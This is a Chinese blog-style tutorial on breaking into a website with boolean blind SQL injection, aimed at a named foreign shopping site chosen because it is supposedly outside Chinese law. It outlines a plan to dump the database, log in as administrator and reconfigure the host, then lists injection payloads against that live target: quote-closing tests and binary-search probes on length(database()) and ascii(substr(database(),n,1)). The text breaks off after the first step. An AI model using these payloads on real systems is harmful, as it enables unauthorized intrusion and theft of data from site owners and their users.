首先,我们祭出不受中国法律保护的外国不知名网站,作为今天的教程:
http://www.atrium.com.pk/Shopping.php?ID=1
简单来说,黑进一家网站的步骤:
1.获取数据库信息
2.用数据库中管理员账号登录
3.找到网站后台页面,对网站主机设置进行配置。
4.(假如是我们这里的网站)承担最严重的法律责任,请最好的律师
废话不多说,直接上教程:
1.获取数据库信息
利用布尔渗透获取该网站的数据库信息,Web界面只会返回True和False。那么布尔盲注就是根据Web界面返回的真假值获取数据库信息。
首先求闭合字符串
求出闭合字符是一个单引号号
1' and 1 = 1 %23正确 正确
1' and 1 = 2 %23错误 网页不存在
1( and 1 = 1 %23错误 网页不存在求数据库长度
下面的代码只是个示例,请根据实际情况利用二分法对网页返回的真假值进行判读,获得网页的数据库长度 %23相当于#,在输入URL地址栏上使用,为了兼容更多系统。
?id = 1'and length(database())>1 %23 正确
?id = 1'and length(database())<10 %23 错误
?id = 1'and length(database())>5 %23 错误
?id = 1'and length(database())>3 %23 正确
?id = 1'and length(database())=4 %23 错误
?id = 1'and length(database())=5 %23 正确求数据库名称
经过几次折半查找,得到第一个字母,然后得到第二个字母,依次得到整个数据库名称
?id=1'and ascii(substr(database(),1,1))>1 %23正确
?id=1'and ascii(substr(database(),1,1))<100 %23正确?id=1'and ascii(substr(database(),2,1))>75 正确
?id=1'and ascii(substr(database(),2,1))>150 错误
?id=1'and ascii(substr(database(),2,1))>100 正确暂且更到这里,明天再更
扫一扫
2万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
